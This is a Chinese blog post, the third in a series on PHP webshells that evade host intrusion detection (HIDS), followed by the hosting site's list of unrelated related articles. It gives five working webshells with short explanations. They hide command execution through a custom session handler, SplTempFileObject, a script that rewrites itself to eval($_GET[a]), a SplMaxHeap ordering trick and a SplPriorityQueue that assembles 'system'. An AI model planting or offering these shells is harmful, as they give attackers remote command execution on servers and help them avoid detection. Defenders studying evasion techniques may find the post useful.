当前位置: 首页 > news >正文

WEB安全--RCE--webshell HIDS bypass3

继WEB安全--RCE--webshell HIDS bypass2的补充:

八、定义类实现接口

webshell:

<?php
ini_set("display_errors",1);
class MySessionHandler implements SessionHandlerInterface
{// implement interfaces herepublic function close(){// TODO: Implement close() method.}public function destroy($id){// TODO: Implement destroy() method.}public function gc($max_lifetime){// TODO: Implement gc() method.}public function open($path, $name){$path($name);}public function read($id){// TODO: Implement read() method.}public function write($id, $data){// TODO: Implement write() method.}
}
$handler = new MySessionHandler();
session_set_save_handler($handler, true);
session_name($_GET[a]);
session_save_path('system');
session_start();

原理:

我们定义了一个类MySessionHandler,其实现了SessionHandlerInterface接口

执行位置在这里

我们传递$path和$name,并用session_start()启动会话就能执行我们定义MySessionHandler类中的open()方法了。

九、读取临时文件

webshell:

<?php
$a = new SplTempFileObject(1000000);
$a->fwrite( $_GET['a']);
$a->rewind();
substr(get_declared_classes()[70],4,6)($a->fgets());
//fgets() 从临时文件中读取一行数据。
?>

原理:

$a = new SplTempFileObject(1000000);

这行代码创建了一个临时文件对象$a,其最大容量为1000000字节。

$a->rewind();

rewind()方法将文件指针移动到文件的开头。这对于后续读取操作是必要的,因为数据已经写入到临时文件中,而现在我们需要从文件的开头读取数据。

十、自己改变自己

webshell:

<?php
$s="Declaring file object\n";
$d=$_SERVER['DOCUMENT_ROOT'].$_SERVER['DOCUMENT_URI'];
$file = new SplFileObject($d,'w');
$file->fwrite("<?php"." eva".$s[3]);
$file->fwrite("(\$_"."GET"."[a]);?>");
include(get_included_files()[0]);
?>

原理:

构造文件绝对路径:

$d=$_SERVER['DOCUMENT_ROOT'].$_SERVER['DOCUMENT_URI'];

使用SplFileObject创建一个文件对象$file,并以写入模式('w')打开文件。

然后$file使用fwrite写入代码,代码执行过后会被修改为

<?php eval($_GET['a']); ?>

get_included_files():返回当前脚本中已经被加载的文件列表

include(get_included_files()[0]);

而get_included_files()[0]就代表返回的是该文件本身,并用include()执行改写后的代码

十一、堆排序

webshell:

<?php
$obj=new SplMaxHeap();
$obj->insert( $_GET[a] );
$obj->insert( 8 );
$obj->insert( 'system' );
$obj->insert( 7 );
$obj->insert( 0 );
//$obj->recoverFromCorruption();
$i=0;
foreach( $obj as $number ) {$i++;if($i==1) {$a = $number;}if($i==2) {$b = $number;}
}
$a($b);

原理:

提取插入过后obj变量的值,后命令执行,

这里需要理解堆排序的原理,然后根据原理来选出$a和$b对应的值

        当我们$_GET[a]传入的数据为s,那么堆排序就是:8 7 0 's' 'system' 

        当我们$_GET[a]传入的数据为99;ls,那么堆排序就是:'system' '99;ls' 8 7 0 

所以第二种情况取出的数据就能拼接为system(99;ls)

十二、优先队列排序

webshell:

<?php
ini_set("display_errors",1);
$objPQ = new SplPriorityQueue();
$objPQ->insert('m',1);
$objPQ->insert('s',7);
$objPQ->insert('e',3);
$objPQ->insert('s',5);
$objPQ->insert('y',6);
$objPQ->insert('t',$_GET[a]);
$objPQ->setExtractFlags(SplPriorityQueue::EXTR_DATA);
//Go to TOP
$objPQ->top();
$m='';
$cur = new ErrorException($_GET[b]);
while($objPQ->valid()){$m.=$objPQ->current();$objPQ->next();
}
echo $m($cur->getMessage());
?>

原理:

与堆排序的原理相似,也是通过传入的参数来影响能否组成命令执行代码

当$_GET[a]传入的值为4,队列的排序会组成system

进而拼接为system($_GET[b]);

http://www.xdnf.cn/news/660331.html

相关文章:

  • try-with-resources
  • md650场景联动
  • 华为OD机试真题——考勤信息(2025A卷:100分)Java/python/JavaScript/C/C++/GO最佳实现
  • Go语言入门指南
  • lwip_bind、lwip_listen 是阻塞函数吗
  • 从实训到实战:家庭教育干预课程的产教融合定制方案
  • 1期临床试验中的联合i3+3设计
  • IndexTTS - B 站推出的文本转语音模型,支持拼音纠正汉字发音(附整合包)
  • 基于web的二手交易商城-设计
  • uniapp好不好
  • 攻防世界 unseping
  • 从0到1搭建AI绘画模型:Stable Diffusion微调全流程避坑指南
  • 企业网站架构部署与优化-Nginx性能调优与深度监控
  • 系统分析师-考后总结
  • 凯恩斯宏观经济学与马歇尔微观经济学的数学建模和形式化表征
  • 【C++11】lambda表达式 || 函数包装器 || bind用法
  • 论文返修时/录用后,能变更作者、增加或减少作者吗?
  • ros2-moveit2 配置与执行自定义urdf的报错处理
  • 基于私有化 DeepSeek 大模型的工业罐区跑冒滴漏检测技术研究与应用
  • Rust 项目实战:命令行搜索工具 grep
  • 1-600MW 燃气轮机市场未来展望:低碳技术、氢能转型与智能化运维发展趋势报告
  • PSDA安装配置
  • 因重新安装python新版本,pycharm提示找不到python.exe(No Python at“c:\python.exe“)问题解决方法
  • 【虚拟仪器技术】期末7个LABVIEW仿真实验
  • 【TVM 教程】开发环境中加入 microTVM
  • 11 接口自动化-框架封装之统一请求封装和接口关联封装
  • 日志采集 Agent 性能大比拼——LoongCollector 性能深度测评
  • win11+vs2022 安装opencv 4.11.0图解教程
  • 【文本分类】KG-HTC 知识图谱提升分类准确率
  • 三色标记法 判断有向图是否有环